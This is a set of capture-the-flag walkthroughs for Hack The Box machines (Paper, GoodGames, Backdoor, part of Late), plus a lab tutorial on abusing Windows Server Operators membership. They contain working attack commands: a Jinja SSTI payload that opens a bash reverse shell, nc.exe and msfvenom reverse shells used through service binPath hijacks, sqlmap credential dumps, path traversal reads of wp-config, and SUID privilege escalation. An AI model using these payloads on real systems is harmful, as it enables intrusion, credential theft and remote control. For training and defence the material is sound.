Let’s start with the port scan. We are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used -sV flag which performs a service version scan against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

nmap  -sV 10.129.74.162

From the nmap scan, we have found there were only three ports open, which is port 22,80 and port 443. As usual HTTP service is running on port 80, HTTPS service is running on port 443 and the SSH service is running on port 22. Both HTTP and HTTPS service is used for the webhosting and the SSH service is used for remote connection. SSH version is latest, and we did not find any vulnerabilities on SSH version 8.0 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80 and 443.



 

Initial Enumeration

We begin enumeration by accessing port 80 and 443 over browser. Webpage does not have much interesting things. From the web page we found it is showing default page of CentOS.

htttp://10.129.74.162

 



Find Domain Name

Command used:

curl -I 10.129.74.162

Flags features:

-I   : Include protocol response headers in the output

Further enumeration of the output result, we see X-backend-server revealed its domain name which is office.paper. We have used Kali inbuilt tool called curl.

https://everything.curl.dev/project



After finding domain name we are adding it to /etc/hosts file in the attacking machine. To add into to hosts file you can use any text editor such as leafpad, gedit, nano or vim.

Why we need to add domain in the local hosts file?

The /etc/hosts file contains a mapping of IP addresses to URLs. Your browser uses entries in the /etc/hosts file to override the IP-address-to-URL mapping returned by a DNS server. This is useful for testing DNS (domain name system) changes and the SSL configuration before making a website live.



 

Web Page Enumeration

Once we add domain name in the /etc/hosts file, we continued our enumeration process and checked HTTP and HTTPS services. From the HTTP service we got a different page this time. The pages include a company name which is Blunder Tiffin Paper Company.  Also, we can seesomeone has left a comment there that everyone has removed from the blog and there is only one user present now. Also, we noted a name (Jan) which can be a potential username and can be useful in our further assessment.



Then we checked the technologies used in the web page and found it is hosted in the WordPress. WordPress is popular for having various vulnerabilities in it. From the wappalyzer result we found that WordPress 5.2.3 is used. We have used a browser-add on called wappalyzer to find out the technology stacks.



 

Searching For the Exploit

 

As we have WordPress version, we searched for the exploit using Kali pre-installed tool called searchsploit.  We found two exploits were there and based on our scenario we decided to go with second one which has given description that an unauthenticated user can retrieve secrets. Searchsploit is a command line tool with similar result as we get from the exploit database. Here are the commands to reproduce the Prove of concept (POC). Please note, -m flag is used to download the exploit.

Command used:

searchsploit Wordpress 5.2.3

searchsploit -m 47690

cat 47690.md

After reading the exploit we found that adding? static=1 can leak its secret contents which can be password or any other information that can be helpful for our further assessment.

 



 

Secrets leaking Vulnerability Exploitation

As exploit mentioned that adding? static=1 in the URL will leak secrets, we tested by providing below URL and found a subdomain URL( http://chat.office.papaer/register/8qozr226AhkCHZdyY).

URL: http://office.paper/?static=1

 

 



Let’s add chat.office.paper to /etc/hosts file again.



 

Subdomain Enumeration

After adding subdomain to the hosts file, we accessed it over the browser and found a rocket.chat CMS which is used for chatting. Being a penetration tester always two things come into mind that what we have and what else we can do with that. So far, we do not have valid credentials to log in, we accessed the URL that we found after exploitation of the vulnerability earlier.

http://chat.office.papaer/register/8qozr226AhkCHZdyY

Accessing below URL, we got a register page where we registered as a new user. We created a user named raj and given a fake email address and password to register an account.



 

Rocket Chat CMS Enumeration

We logged in as new user raj into the rocket.chat CMS and read all the conversation of other users from general channel. There are 3 users and one bot user.

After reading their messages, we found that DwightKSchrute has assigned a bot named recyclops to help other users to answer the common queries. Furthermore, he has also mentioned that a user can call bot by typing recyclops help in their chat windows and bot will be there to help them.



As we can see on the above picture, when someone called bot for the help a default message come into the screen about the bot itself and instructions. If we have closer look into the messages, we can see there are some frequently asked questions. Furthermore, it has a feature to receive answer of our query directly into our message box as well.

 



As we have logged in as raj user, which is a new account we have created earlier, we are calling recyclops by typing help into the chat window. A same message and instructions came into our chat windows which confirms that recyclops is activated.



When we scroll down to check all the features and services providing by the recyclops. We notice that we can also list the files from some shared directories and get those files with the help of the bot.



Bot Feature Abuse

From the above message of the bot, we got to know that it has limited feature set to particular folder. Recylops can only list and get files from the sales directory only we decided to list what sales directory contains by providing list command into the chat window.

 



From the output, we found that there is user Dwight present there and a salefolder in the sales directory. Then we decided to enumerate further by going one step back from the sales directory and we got into Dwight home directory. There we saw a non-standard directory (hubot) present in the Dwight home directory.



Next, we checked the non-standard directory and listed all the files presents in the hubot and notice there is .env file present there. Let’s talk about the environment files in the linux system and why its is important to enumerate.

What is env file?

.env files are used to store those variables and they should be written in all uppercase separated with underscores for naming convention. we access those variables through process.env after installing dotnev npm package.

 

Why it is important to check environment files?

These environment files may contain password in plain taxed format as well as in base64 format. If an attacker found any secrets from this file, then he/she can leverage a user account.



Now we know the importance of the environment files in a Linux distribution. Let’s check .env file to test the theory we have discussed above. We can view the file contests by providing directory path and the file name with filecommand.

Command used:

file ../hubot/.env

As we can see a plain texted password from the .env file. We got the password but not username so, from the penetration testing methodology we can check this password against all users that we have seen in the messages. We tested obtained password on SSH service against all users and got success on Dwight.

Username: dwight

Password: Queenofblad3s!23



User flag

We successfully logged in via SSH as Dwight into the target machine. We can grab user flag from the user home directory. Also, we need to escalate privilege, so we transferred linpeas script into the target /tmp directory. Please note, we need to setup python server into our kali machine to transfer the script to the target machine.  Also, we have given full permission to the linpeas script to execute it. For more information about linux file permissions, feel free to visit below link:

https://www.guru99.com/file-permissions.html#:~:text=Linux%20divides%20the%20file%20permissions,ownership%20of%20a%20file%2Fdirectory.

What is linpeas and why we are using it here?

Linpeas is a popular tool used to search for possible paths to escalate privileges on Linux, Unix, and MacOS hosts.

Command used to log in via ssh:

ssh dwight@10.129.74.162

 Command used to transfer script:

From attacker side:

python3 -m http.server 80

On Target side:

wget 10.10.14.12/linpeas.sh

Command used to transfer script:

chmod 777 linpeas.sh

./linpeas.sh



Privilege Escalation

From the linpeas output, we saw few CVEs appeared as red which means these CVEs could be the potential exploits which may help us to escalate privilege to the root account. A privilege escalation attack is a cyberattack designed to gain unauthorized privileged access into a system. Attackers exploit human behaviours, design flaws or oversights in operating systems or web applications.



PolicyKit Exploit: CVE-2021-3560

After searching those exploits, we have found many of them require compiling, so we decided to go with CVE-2021-3560 as all these 3 exploits works similarly based on the target system dependencies. Then we found a nice article about the policy kit exploitation the in the Hacking articles which has a very clear instructions to exploit it. The full article is available in the below link:

https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/

Background of the vulnerability can be found here:

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

Reference of the exploit we have used here:

https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

We simply downloaded the exploit from the github into our kali machine and transferred it to the target machine as we did earlier to transfer linpeas.  We used wget command to download the exploit from the GitHub, you may use other utility as well such as curl.

Command used to download:

wget https://raw.githubusercontent.com/Almorabea/Polkit-exploit/main/CVE-2021-3560.py



On the target side we downloaded the CVE-2021-3560.py exploit to the target /tmp directory with wget command. Then we execute the python script with python3.

Command used:

On target side:

wget 10.10.14.12/ CVE-2021-3560.py

python3 CVE-2021-3560.py



Root Flag

After successfully execution of the script, it spawned a root shell. Now we can grab root flag from the root directory.


Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, Information leakage vulnerability, chat bot feature abuse, file transfer, file permissions, importance of environment file in the Linux and policy kit vulnerability to perform local privilege escalation.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!


GoodGames HackTheBox Walkthrough

0
0

Summary

GoodGames is Linux machine and considered as easy box by the hack the box, but it was tricky indeed. On this box we will begin with basic port scan and move laterally. Then we will enumerate domain name and subdomains. Then we will exploit SQL Injection vulnerability using burp and SQLmap. Exploitation of the server-side template injection (SSTI) will give us initial foothold to the target machine. Then we will be tasked to gain root access where we will exploit it by taking advantage of the special permissions and ownerships both in server and the Docker. A successful binary abuse will give us a root shell into the target system.

Table of content

Initial Access

  • TCP Port Scan

  • Initial Enumeration

  • Web Page Enumeration

  • SQL Injection Exploitation with sqlmap

  • Admin Console Enumeration

  • Internal Sub Domain Enumeration

  • Server-Side Template Injection (SSTI) Exploitation

  • User Flag

  •  

Privilege Escalation

  • Docker Enumeration

  • SUID Permission abuse

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

TCP Port Scan

Let’s start with the port scan. We are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used -sV and -sC flags which performs a service version scan with NSE scripts against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

-sC   :  Scans with default NSE scripts

 

nmap  -sV -sC 10.129.33.160

From the nmap scan, we have found there were only one port is open, which is port 80. As usual HTTP service is running on its default port and the HTTP service is used for the webhosting. Let’s take some notes about our findings.



 

Initial Enumeration

As we have only one port is open, we begin with port 80 enumerating by accessing it over browser and found web page. From the webpage interface, it is look like video game online store. If we see our nmap result, we gathered earlier showing the http title as Goodgame community and store that makes sense.

 



 

Web Page Enumeration

While enumerating webpage we found a login page. From the login in page, we can enumerate further by registering ourselves as a new member or if we have valid credentials, we can directly log in to do the same.



Before registering a new user account lets capture the log in request on burp. Here we are using a random email and password. You can use any random credentials to capture request for the testing purpose.



We are capturing login request on burp to check if there is any SQL injection vulnerability present in the target system. We captured the request and saved as sqlfile.  The reason we are checking SQL injection vulnerability as there is a login page and it is worth checking SQL injection in login pages and on any user input field. Most of the time, SQL injection vulnerabilities found in user input fields in the web application.



 

SQL Injection Exploitation with sqlmap

Next, we are going to check the database name by loading the login request that we captured on burp. In the below picture, we have loaded sqlfile on sqlmap which will going to find out the database name if the web application login parameter is vulnerable to the SQL injection. Full function of the flags are given below.

sqlmap -r sqlfile –dbs --batch

--dbs : Enumerate DBMS databases

--batch: Never ask for user input, use the default behaviour

-r : Request



Once we get the database name then we will dump all the contents that database is containing by issuing request file, database name.

sqlmap -r sqlfile -D main –dbs --batch

--dump-all : Dump all

-D: Database name

--batch: Never ask for user input, use the default behaviour

-r: Request

 



After dumping all the contents from the main database, we have found username, email and password hash. Here we are going to keep a note of dumped information.



It is look like md5 hash but what can we do with this hash? Until we have a plain texted password, we cannot proceed further. So, we simply copy full hash and pasted on google gave us a plain texted password of md5hash. What else we could do if we did not get plain texted password from google? Then we can use crackstation website to crack hash or hashcat and john tools to crack the hash offline.

Password: superadministrator



 

Admin Console Enumeration

As we have admin user password in plain texted form, we can try log in as admin user in the web console for the further assessment.



After logging in, we tried enumerating administrator account but unfortunately, we did not get anything interesting there. There was same information that we already have but nothing much more.



Then we decided to check source code of the admin profile page and found a new subdomain there. It is worth checking source code as many times we may get valuable information from there such as subdomain or any secrets from the comment etc.

Subdomain url:  http://internal-administration.goodgames.htb

 


Let’s add it to /etc/hosts file in the attacking machine.

Why we need to add domain in the local hosts file?

The /etc/hosts file contains a mapping of IP addresses to URLs. Your browser uses entries in the /etc/hosts file to override the IP-address-to-URL mapping returned by a DNS server. This is useful for testing DNS (domain name system) changes and the SSL configuration before making a website live.



Internal Sub Domain Enumeration

After adding internal sub-domain to the hosts file, we accessed it over browser where we have seen a new web page with login page. We used the same credentials that we used earlier to Flask Volt sign in system.



Server-Side Template Injection (SSTI) Exploitation

From the information we gathered during nmap scan that server-side code was python, so it is worth checking the Server-side template injection (SSTI). Here we are using a payload to detect SSTI, and the detection process is like the XXS. We have found that user input field is vulnerable to SSTI as it is reflecting the sum of the payload provided.

What is SSTI vulnerability?

A server-side template injection (SSTI) vulnerability occurs when user data is embedded directly in a template and then interpreted by the template engine. This allows attackers to inject arbitrary directives to manipulate the template engine.

 

Detection payload: {{5*5}}

 


Now it is confirmed that target system is vulnerable to the SSTI, now we are in the position to move forward to inject a reverse shell payload. For the reverse shell we are using a popular git repository “Payload All The Things” where you will find all the payloads you will need during your penetration testing engagement. Please note, we will need to modify payload to receive reverse shell. For example, we need to issue our attacking machine IP address (10.10.14.93) and port number (1234) where we wish to listen.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#exploit-the-ssti-by-calling-subprocesspopen

Original payload: {{ namespace.__init__.__globals__.os.popen('id').read() }}

 

Modified payload: {{ namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.93/1234 0>&1"').read() }}

When our payload is crafted then we will inject it into the user input field which is “Full Name”  in the target web application then we will start a netcat listener in our attacking machine with below command.

nc -lvp 1234

 


 

User flag

Next, we will execute it by clicking on Save all tab which will execute our malicious payload in the target system and send a remote connection back to our netcat listener. In the below screenshot, we can see that we have successfully received a reverse connection as user root. But there is a trick, it is not the real root shell which we will discuss later. Once, we get reverse connection then we can grab user flag from the /home/augustus directory.

 

 



Privilege Escalation:

Docker Enumeration

While enumerating for the privilege escalation vectors, we found a Docker file present in the root backend directory (/backend) which give an insight that sever is using docker container in it. Let’s talk docker role in the box or in any server. Please note, that we are in the docker container not in the real server.

We checked the network interface and found it is connected to the internal network adaptor on 172.19.0.2/16subnet that means we cannot communicate with the internal network directly from our kali system, but the compromised host can communicate with the internal network. In this scenario we can use port forwarding or pivoting technique to communicate directly from our kali system but before jumping into that we also need to verify which hosts are up in the internal network. To find out the available host in the internal network we are going to use nmap static binary which means a portable nmap binary that we can use from the compromise hosts system against the internal network. We can download nmap static binary from below link by providing following command:

 

wgethttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

Reference: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

 



Then we will transfer this binary to the compromised host using python server by issuing following command from our kali system:

python3 -m http.server 80

Once server is on then we can download nmap binary from kali by issuing following command from the compromised host:

wget 10.10.14.93/nmap

Please note we have used kali IP address as we are transferring binary from there.

 



Next, we will give full permission to the binary so we can execute it against the internal network in order to find live hosts. For more information about Linux file permissions.

Here we have provided -sn flag which will only show number of available hosts in the subnet and their IP addresses. From the nmap scan result we found that 172.19.0.1 is up.



Once we found the potential target host from the internal network. We decided to enumerate further against it. Next, we will run another nmap scan against the potential target host (172.19.0.1) verbosely with -v flag to get more information about the target system. Here is the command to reproduce the prove of concept (POC).

./nmap 172.19.0.1 -v

From the nmap scan we found that 2 ports are open where 22 port is running SSH service and port 80 is running HTTP service.

 



 

SetUID Permission Abuse

Now we are trying to log in to the server as augustus from the docker container using same password we cracked from the md5 hash earlier. Then we copied /bin/bash binary to augustus home directory which will be available in the docker as well. Next, we will exit the shell and go back to docker root shell where we have privilege to set SUID to bash binary as root. There we will change the ownership of the bash binary where we have given root user ownership. Next, we will change the permission and give augustus full permission on bash binary.

Why are we doing it and what’s the story?

As we know we got a root shell on docker, we cannot get root flag from the docker as it is not present there because it is just a container which is used for the web hosting. And we have access on server as user augustus who is a low privileged user, so he has limited permissions on the server and the goal is to gain root shell on the server.

Here augustus can download or copy bash binary on his home directory in the server but he cannot change ownership because of limited permission as low privileged user. On the other hand, from the root docker shell we have root permission who can change ownership but no bash binary present in the docker that’s why we copied bash binary as augustus on his home directory then switched to docker root shell so we can change ownership of the binary. Once we change ownership then it will consider that bash binary is owned by root and if anyone execute it then it will spawn a bash root shell which is our goal to achieve.

Only changing ownership will not work until we give execute permission to augustus. If he can execute it, then a root shell will be spawned so that’s why at the last step we are also issuing full permission to augustus on that binary. Steps to reproduce the POC:

ssh augustus@172.19.0.1

Shell upgrade to interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Copy bash binary to augustus home directory:

cp /bin/bash .

Change Ownership of the binary:

chown root:root bash

Give full permission:

chmod 4777 bash

 


Root Flag

Then we again switched to augustus shell and navigate to bash SUID set binary which is available on augustus home directory. Execution of the SUID binary spawned a bash root shell. Now we can grab our root flag from /root/root/ directory. Here are the steps to reproduce the POC.

ssh augustus@172.19.0.1

./bash -p

cat /root/root/root.txt

Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, SQL injection vulnerability Enumeration using burp suite, Exploitation of SQL injection with SQLmap, Server-Side Template Injection vulnerability enumeration and exploitation, file transfer, file permissions, about nmap static binary, internal network, Docker, Set UID permissions on docker to perform local privilege escalation.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Windows Privilege Escalation: Server Operator Group

0
0

Background:

The Windows Server operating system uses two types of security principals for authentication and authorization: user accounts and computer accounts. These accounts are created to represent physical entities, such as people or computers, and can be used to assign permissions to access resources or perform specific tasks. Additionally, security groups are created to include user accounts, computer accounts, and other groups, in order to make it easier to manage permissions. The system comes pre-configured with certain built-in accounts and security groups, which are equipped with the necessary rights and permissions to carry out functions.

Table of content:

  • Introduction to windows privileged groups

  • Server Operator group summary

  • Lab configuration on Server

  • Vulnerability Analysis

  • Exploitation Method 1

  • Exploitation Method 2

  • Remediation

  • Conclusion

 

Introduction to windows privileged groups

In Active Directory, privileged groups are also known as security groups. Security groups are collections of user accounts that have similar security requirements. By placing user accounts into appropriate security groups, administrators can grant or deny access to network resources in bulk. Security groups can be used to grant or deny access to network resources, such as shared folders, printers, and applications. They can also be used to assign permissions to user accounts, such as the ability to create, delete, or modify files.

Active Directory also provides features to help administrators manage and secure privileged groups. For example, administrators can enable Group Policy Objects (GPOs) to manage the permissions of privileged groups. GPOs can be applied to a specific group of users or to the entire domain. Additionally, administrators can use the Local Users and Groups snap-in to control the membership of privileged groups. This snap-in can be used to add or remove user accounts from privileged groups, as well as modify the permissions of those groups. For more about windows security groups feel free to visit Microsoft official documentation page:

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups

Server operator group summary

The Server Operator group is a special user group that often has access to powerful commands and settings on a computer system. This group is typically used for managing a server or for troubleshooting system problems. Server Operators are usually responsible for monitoring the server's performance, managing system security, and providing technical support to users. They may also oversee installing software updates, creating and maintaining user accounts, and performing routine maintenance tasks.

Lab Configuration on server

Let configure the lab on server to apply theory and escalated windows server privileges. Go to server manager dashboard then click on “Tools” then select “Active Directory Users and Computers”.



 

We are going add a user aarti to the active directory security group for the demonstration. To do that, go to “users” and select “aarti” and click on “properties”.




 

That will open a new window where we need to click on “ member of“ tab then click on “add” button to add user on any specific group.



A new window will open where we need to select object types as “Groups or Built-in security principals” and select location to domain name which is “ignite. local” here. Then, we need to enter object name which is the group that we wish to add user to. In this case we are using server operators’ group then click ok.

 


We can verify whether user is added to server operators’ group by simply clicking on members of tab. We can see that we have successfully added user aarti to server operators’ group.



We end up our lab set up here and logged in as low privileged user in the server where we can see user aarti is in the server operators’ group. In this example we have connected to the compromised host using winrm service using evil-winrm tool. To check group permission, we can simply use inbuilt commands “net user <username>”, it will show what groups current user belongs to. To reproduce the concept, please follow the commands below:

evil-winrm -I 192.168.1.16 -u aarti -p Ignite@987

net user aarti



Vulnerability analysis

Being member of server operator group is not a vulnerability, but the member of this group has special privileges to make changes in the domain which could lead an attacker to escalate to system privilege. We listed services running on the server by issuing “services” command in our terminal where we can see list of services are there. Then we noted service name “VMTools” and service binary path for lateral usage.


Exploitation Method 1

Then we transferred netcat.exe binary to the compromised host and changed the binary path of the service. The reason we are changing binary path is to receive a reverse connection as system user from the compromised hosts.

How it works?

When we start any service then it will execute the binary from its binary path so if we replace service binary with netcat or reverse shell binary then it will give us a reverse shell as system user because the service is tarting as system on the compromised host. Please note, we need to specify the attacker IP address and listening port number with the netcat binary.

Steps to reproduce the POC:

upload /usr/share/windows-binaries/nc.exe

sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"



Then we will stop the service and start it again. So, this time when service starts, it will execute the binary that we have set in set earlier. Please, set up a netcat listener on kali system to receive system shell before starting service and service start and stop commands from compromised hosts.

nc -lvp 1234

sc.exe stop VMTools

sc.exe start VMTools



We have received a reverse shell from the compromised host as nt authority\system. To verify it simply run “whoami” command.



 

Exploitation Method 2

In this method, we are going to use Metasploit reverse shell binary instead of using nc.exe. Let’s create a msfvenon reverse shell binary and save it as shell.exe. Let’s break out the commands we used to create msfvenom reverse shell binary payload. Here we have selected payload type which is based on target host operating system (windows/x64/shell_reverse_tcp), then lhost and lport which is listening host (Attacker IP) and listening port (8888) in our case, lastly, we issue filetype with -f flag which will save our payload in exe format and saved it as shell.exe.

msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.1.205 lport=8888 -f exe > shell.exe



Once we create the reverse shell payload binary then we will upload it to the compromised system. We have our binary saved in the in the root directory, it is possible that it might be different in your case.

upload /root/shell.exe



Then we will do the same steps we did in the method one. Here we do not need to provide IP address of the attacker machine as it is already there in the shell.exe binary. The concept is same, just we have changed the binary here, so we do not have to specify listening IP and port number while setting service binary path. To reproduce the POC follow below commands:

sc.exe config VMTools binPath="C:\Users\aarti\Documents\shell.exe"

sc.exe stop VMTools

sc.exe start VMTools

Please note: Make sure you have turned on the netcat listener on port 8888 on kali system to receive the reverse connection as system.



As we have changed the service binary path to shell.exe path. Now if we call that service, it will execute shell.exe instead of its own binary which will send a connection back to kali system as nt authority\system.

Here we can see, we have successfully received a reverse connection as system user in the netcat listener.



 

Remediations:

There are multiple factors and ways which can help to hardening the system.

1. Restrict access to privileged accounts: All privileged accounts should be restricted to a few trusted individuals and should be monitored for any suspicious activity.

2. Use strong passwords: Strong passwords should be used for all privileged accounts, and they should be changed regularly.

3. Use two-factor authentication: Two-factor authentication should be used for all privileged accounts to ensure that only authorized individuals can access them.

4. Monitor privileged accounts: All privileged accounts should be monitored for any suspicious activity, such as unauthorized access attempts or suspicious commands.

5. Implement role-based access controls: Access to privileged accounts should be restricted to only those individuals who need it, and their access should be limited to only the functions they need to perform.

6. Regularly audit user accounts: Regular audits of user accounts should be conducted to ensure that only authorized individuals have access to privileged accounts.

7. Limit remote access: Remote access to privileged accounts should be limited to only those individuals who need it, and their access should be monitored.

8. Harden systems: Systems should be hardened to reduce the risk of exploitation, such as patching regularly, using antivirus software, and implementing least privilege policies. Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Conclusion:

We have explored windows privileged group briefly and its special privileges which can allow an attacker to gain system privilege in an any enterprise network. We have explored multiple techniques to exploit windows security group privileges. Lastly, we unpacked it with remediations to help businesses and enterprises to secure their network. I hope you have learned something new today. Happy hacking!

Backdoor HackTheBox Walkthrough

0
0

 Summary

Backdoor is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally. Then we will enumerate WordPress webpage.  Then we will do vulnerability assessment and exploit directory traversal vulnerability. From the running process we will be exploiting GDB server and gain initial foothold into the target system. Then we will be tasked to gain root access where we will exploit it where SUID is set to screen.

Table of Content

Initial Access

  • Nmap TCP Port Scan

  • Web Page Enumeration

  • Searching For the WordPress eBook Exploit

  • Directory Traversal Vulnerability Exploit

  • Enumerate Running process in the target system

  • Searching for the GDB Server Exploit

  • GDB Server RCE Exploitation

  • User Flag

Privilege Escalation

  • SUID-Screen Exploitation

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

Nmap TCP Port Scan

Let’s start with the port scan. We are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform port scan, we have used -sV and -p- flag which performs a service version and full port scan against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

-p-   :  Attempts to full port scan

 

nmap  -p- -sV 10.129.96.68

From the nmap scan, we have found there were only three ports open, which is port 22,80 and port 1337. As usual HTTP service is running on port 80, SSH service is running on port 22 and we do not know about 1337 now. HTTP service is used for the webhosting and the SSH service is used for remote connection. SSH version is latest, and we did not find any vulnerabilities on SSH version 8.2p1 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

 



 

Web Page Enumeration

We begin with enumerate port 80 and accessing it over the bowser shown a WordPress site. Nothing looks interesting here in the web page, we saw a backdoor title of the machine name backdoor. The backdoor could be the domain name here.

 



Then we decided to check its plugin using default directories. A list of the default WordPress directories can be available here:

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress

The default plugin directory path is:

/wp-content/plugins/

We saw an ebook-downloaddirectory is present there. We can check if there are any public exploits available for the eBook WordPress plugin.



Searching For the WordPress eBook Exploit

We are using a kali inbuilt tool searchsploit to find out if any exploits are available in the public exploit database. From the searchsploit result, we found that WordPress eBook download has a directorytraversalvulnerability. Then we downloaded the exploit to analyse how it works. We can download it using -m flag on searchsploit.  After analysing the exploit code, we found a vulnerable path parameter which is vulnerable to File inclusion.

searchsploit ebook wordpress

searchsploit -m 39575

cat 39575.txt

 



 

Directory Traversal Vulnerability Exploit

As we have the vulnerable parameter, now we are in the position to exploit it. We tried to exploit WordPress configuration file (wp-config) which have sensitive information such as database credentials of the WordPress. As expected, we got WordPress database username and the password but did not work with any available service.

 

Curl 10.129.96.68/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php



Then we decided to list the users in the target system. It is available in the /etc/passwdfile in Linux systems. We saw a user named user is available in the target system and we tried log in via SSH with the obtained password and again failed to gain access.



Many attempts of gaining foothold in the target system failed. Then we decided to enumerate further. Then we created a bash script to find out what processes are running on the target system because sometime third-party application may have some vulnerabilities which could lead an attacker to gain access in the target system.

 


As we can see a GDB server is running on the target system. We can check whether we can find any vulnerabilities available for the GDB server. There are possibilities to have some other application installed which is also vulnerable to remote code execution.



Alternative:

We can also check running process manually, below file can be used to check it. Just need to replace the file name with /proc/sched_debug on the vulnerable parameter.

/proc/sched_debug

Searching For the GDB Server Exploit

We are again using searchsploit to find out, if there is any public exploit is available for the GDB server which could help us to gain the initial foothold in the target system. From the searchsploit result, we found that gdbserver 9.2 is vulnerable to the remote code execution, but we do not know its version yet. Sometimes it is hard to find out the version of the installed application and we must test each exploit as there is only one so its worth checking it. We downloaded the exploit to check how it works.

searchsploit -m 50539

 



 

GDB server RCE Exploitation

After download the exploit, we analysed the exploit code where we got its usage instructions. The exploit is indicating to create a msfvenom binary reverse shell and payload syntax is given in it. If we have a closer look, we can see that exploit is indicating that the GDB port number to 1337 and we also found port 1337 is open in the target system.



 

Let’s create a reverse shell binary using msfvenom. In the payload we have given attacker IP address (10.10.14.65) and listening port number (4444). Then we saved it as rev.bin.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.65 LPORT=4444 PrependFork=true -o rev.bin

 



User flag

After creating reverse shell binary, we followed the instructions from the exploit. Before firing the exploit, we turned on the netcat listener on our kali system on port 4444. Then we provided target Ip address and target port where GDB server is running on the target system and our reverse shell. To reproduce the POC then follow the commands given below:

python3 50539.py 10.129.96.68:1337 rev.bin



After firing the exploit against the target system, we successfully receive a reverse shell as user on port 4444. We can grab our user flag from the user home directory.



Privilege Escalation

Next, we need to escalate to root account from the low privileged user account. We enumerated target system and then decided to check SUID.

 

SUID-Screen Exploitation

Let’s list all the SUID binaries available in the target system. We saw a SUID screen is appeared in the results. It is like Tmux and if there is any screen session is running by the root then we can attach that session with current user which will give us a root shell.

find / -perm -u=s -type f  2>/dev/null

What is screen in Linux?

screen command in Linux provides the ability to launch and use multiple shell sessions from a single ssh session. When a process is started with 'screen', the process can be detached from session & then can reattach the session later.

 

To maker our exploit work, we need upgrade our current shell and attach the root screen session with our current user.

export TERM=xterm

screen -r root/root



Root Flag

After attaching a root screen session with current user, we received a root shell spawned. Now we can grab our root flag from the root directory.



 

 

Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, service enumeration, Directory Traversal vulnerability, process enumeration on the target system, Special permissions (SUID), SUID exploit to perform local privilege escalation.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Late HackTheBox Walkthrough

0
0

Summary

Late is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally based on findings. Then we will enumerate HTTP service and hunt vulnerabilities present in the web page.  Laterally, we will exploit server-side template injection (SSTI) vulnerability to gain an initial foothold into the target system. Then we will be tasked to gain root access where we will exploit it by abusing file ownership and  cron job.

Table of content

Initial Access

  • Nmap TCP Port Scan

  • Web Page Enumeration

  • Vulnerability Assessment

  • Server-Side Template Injection Exploitation

  • User Flag

Privilege Escalation

  • Find Privilege Escalation Vectors

  • Escalate Privilege via owned file set to cron job

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

Nmap TCP Port Scan

We begin with the port scan where we are using nmap to find out which ports are open and what services are running in the target host. Nmap is a popular port scanning tool come with Kali Linux. To perform port scan, we have used -sV flag which performs a service version against the target machine.

Flags features:

-sV   :  Attempts to determine the service version

 

nmap -sV 10.129.227.134

From the nmap scan, we have found there were only two ports open, which is port 22 and port 80. As usual HTTP service is running on port 80 and SSH service is running on port 22.  HTTP service is used for the webhosting where SSH service is used for remote connection. We did not find any vulnerabilities on SSH version 7.6p1 and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

 



 

Web Page Enumeration

We enumerate port 80 and accessing it over the bowser shown an Image related website. Nothing looks interesting here in the web page, we saw a heading “Worlds Simplest Image Utilities” that works for graphics and title “late” which can be a potential domain name.

 



Then we checked source code of the web page as many times we find sensitive information in the comment section and URLs. There we found a domain name http://images.late.htb/.



Next, we added the domain name into the /etc/hosts file in our attacking machine to enumerate further about Domain. You can use any text editor to add domain to hosts file.



 

Vulnerability Assessment

After adding it into the hosts file, we accessed http://image.late.htb over browser and we got a new web page where we can upload images. After analysing the functionalities of the web page, we found that web page converts any image into text format. For example, if we have any text on image then it will convert it to text format.

 



Then we decided to check how it functions and also created a Server-Side Template Injection (SSTI) payload and saved it as payload.png which makes sense as it converts images to text. We can write a payload using text editor and take a screenshot and save it as png format as well.

{{7*7}}



After creating our payload, we uploaded it into the web page. You can click on browse tab and upload it from the directory you have kept our payload.png file. We can see Convertio CMS is being used to convert image file to text files. Convertiois popular open-sourced image to text convertor.

 



